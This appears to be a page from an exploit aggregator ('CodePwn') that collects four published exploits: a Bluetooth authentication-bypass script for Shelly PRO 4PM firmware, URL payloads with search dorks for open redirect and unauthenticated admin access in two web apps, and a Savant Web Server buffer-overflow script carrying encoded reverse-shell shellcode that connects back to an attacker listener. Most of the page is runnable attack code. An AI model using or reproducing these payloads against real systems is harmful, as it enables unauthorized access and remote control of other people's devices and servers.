Latest exploits :: CodePwn

<pre><code>#!/bin/bash # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass # Google Dork: NA # Date: 2nd August 2023 # Exploit Author: The Security Team [exploitsecurity.io] # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability # Vendor Homepage: https://www.shelly.com/ # Software Link: NA # Version: Firmware v0.11.0 (REQUIRED) # Tested on: MacOS/Linux # CVE : CVE-2023-33383 IFS= failed=$false RED="\e[31m" GREEN="\e[92m" WHITE="\e[97m" ENDCOLOR="\e[0m" substring="Connection refused" banner() { clear echo -e "${GREEN}[+]*********************************************************[+]" echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |" echo -e "${GREEN}| CVE: CVE-2023-33383 |" echo -e "${GREEN}[+]*********************************************************[+]" echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}" } banner read -s -n 1 key if [ "$key" = "x" ]; then exit 0; elif [ "$key" = "" ]; then gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary) if [ -z "$gattout" ]; then echo -e "${RED}Connection timed out${ENDCOLOR}" exit 0; else sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1 echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}" sleep 1 if [ $? -eq 1 ]; then $failed=$true exit 0; fi sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1 sleep 1 if [ $? -eq 1 ]; then $failed=$true echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}" exit 0; else sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1 sleep 1 for i in {1..5} do echo -ne "${GREEN}." sleep 1 done echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}" fi fi fi </code></pre>

<pre><code>==================================================================================================================================== | # Title : Web Portal People CMS v2.8 URL redirection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : webportalpeople.com ~ ourclassonline.com | | # Dork : intext:''To obtain a site like this for your class visit www.ourclassonline.com.'' | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /chat/chat/input.php3?D=10&From=https://cxsecurity.com/author/indoushka/1/&L=english&N=20&NT=1&O=1&PWD_Hash=32cc5886dc1fa8c106a02056292c4654&R=Default&ST=1&T=1&U=1&Ver=L [+] http://wths1958com/chat/chat/input.php3?D=10&From=https://cxsecurity.com/author/indoushka/1/&L=english&N=20&NT=1&O=1&PWD_Hash=32cc5886dc1fa8c106a02056292c4654&R=Default&ST=1&T=1&U=1&Ver=L Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Web Stock v3.0 Unauthorised Administrative Access Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : http://webstock.co.in/ | | # Dork : Designed by Web Stock | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Allow view administrative interface. [+] use payload : /admin/admin-menu.php [+] http://lbcjagrancom/admin/admin-menu.php Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code># Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter) # Date: [30/07/2023] # Exploit Author: [0xBOF90] # Vendor Homepage: [link] # Version: [app version] (3.1) # Tested on: [Windows 10] import socket import sys try: server = b"192.168.56.102" #\x00\x0a\x0d\x25 port = 80 size = 253 # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25" buf = b"" buf += b"\xdb\xc0\xd9\x74\x24\xf4\xbf\x57\xe2\x90\xa0\x58" buf += b"\x31\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x2f" buf += b"\xf1\x72\x55\x33\x1d\xf0\x96\xcb\xde\x95\x1f\x2e" buf += b"\xef\x95\x44\x3b\x40\x26\x0e\x69\x6d\xcd\x42\x99" buf += b"\xe6\xa3\x4a\xae\x4f\x09\xad\x81\x50\x22\x8d\x80" buf += b"\xd2\x39\xc2\x62\xea\xf1\x17\x63\x2b\xef\xda\x31" buf += b"\xe4\x7b\x48\xa5\x81\x36\x51\x4e\xd9\xd7\xd1\xb3" buf += b"\xaa\xd6\xf0\x62\xa0\x80\xd2\x85\x65\xb9\x5a\x9d" buf += b"\x6a\x84\x15\x16\x58\x72\xa4\xfe\x90\x7b\x0b\x3f" buf += b"\x1d\x8e\x55\x78\x9a\x71\x20\x70\xd8\x0c\x33\x47" buf += b"\xa2\xca\xb6\x53\x04\x98\x61\xbf\xb4\x4d\xf7\x34" buf += b"\xba\x3a\x73\x12\xdf\xbd\x50\x29\xdb\x36\x57\xfd" buf += b"\x6d\x0c\x7c\xd9\x36\xd6\x1d\x78\x93\xb9\x22\x9a" buf += b"\x7c\x65\x87\xd1\x91\x72\xba\xb8\xfd\xb7\xf7\x42" buf += b"\xfe\xdf\x80\x31\xcc\x40\x3b\xdd\x7c\x08\xe5\x1a" buf += b"\x82\x23\x51\xb4\x7d\xcc\xa2\x9d\xb9\x98\xf2\xb5" buf += b"\x68\xa1\x98\x45\x94\x74\x0e\x15\x3a\x27\xef\xc5" buf += b"\xfa\x97\x87\x0f\xf5\xc8\xb8\x30\xdf\x60\x52\xcb" buf += b"\x88\x4e\x0b\xeb\x2d\x27\x4e\x0b\xab\x8e\xc7\xed" buf += b"\xd9\xe0\x81\xa6\x75\x98\x8b\x3c\xe7\x65\x06\x39" buf += b"\x27\xed\xa5\xbe\xe6\x06\xc3\xac\x9f\xe6\x9e\x8e" buf += b"\x36\xf8\x34\xa6\xd5\x6b\xd3\x36\x93\x97\x4c\x61" buf += b"\xf4\x66\x85\xe7\xe8\xd1\x3f\x15\xf1\x84\x78\x9d" buf += b"\x2e\x75\x86\x1c\xa2\xc1\xac\x0e\x7a\xc9\xe8\x7a" buf += b"\xd2\x9c\xa6\xd4\x94\x76\x09\x8e\x4e\x24\xc3\x46" buf += b"\x16\x06\xd4\x10\x17\x43\xa2\xfc\xa6\x3a\xf3\x03" buf += b"\x06\xab\xf3\x7c\x7a\x4b\xfb\x57\x3e\x6b\x1e\x7d" buf += b"\x4b\x04\x87\x14\xf6\x49\x38\xc3\x35\x74\xbb\xe1" buf += b"\xc5\x83\xa3\x80\xc0\xc8\x63\x79\xb9\x41\x06\x7d" buf += b"\x6e\x61\x03" httpMethod = b"\x31\xC9\x85\xC9\x0F\x84\x11" + b" /" # xor ecx, ecx; test ecx, ecx; je 0x17 egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53" egghunter += b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c" egghunter += b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7" egghunter += b"\xff\xe7" inputBuffer = b"\x90"*10+egghunter inputBuffer += b"\x41" * (size-len(egghunter)-10) inputBuffer += b"\x74\x86\x41"#0x00418674 httpEndRequest = b"\r\n\r\n" shellcode = b"w00tw00t"+buf buf = httpMethod + inputBuffer + httpEndRequest +shellcode print("Sending evil buffer...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server, port)) s.send(buf) s.close() print("Done!") except socket.error: print("Could not connect!") </code></pre>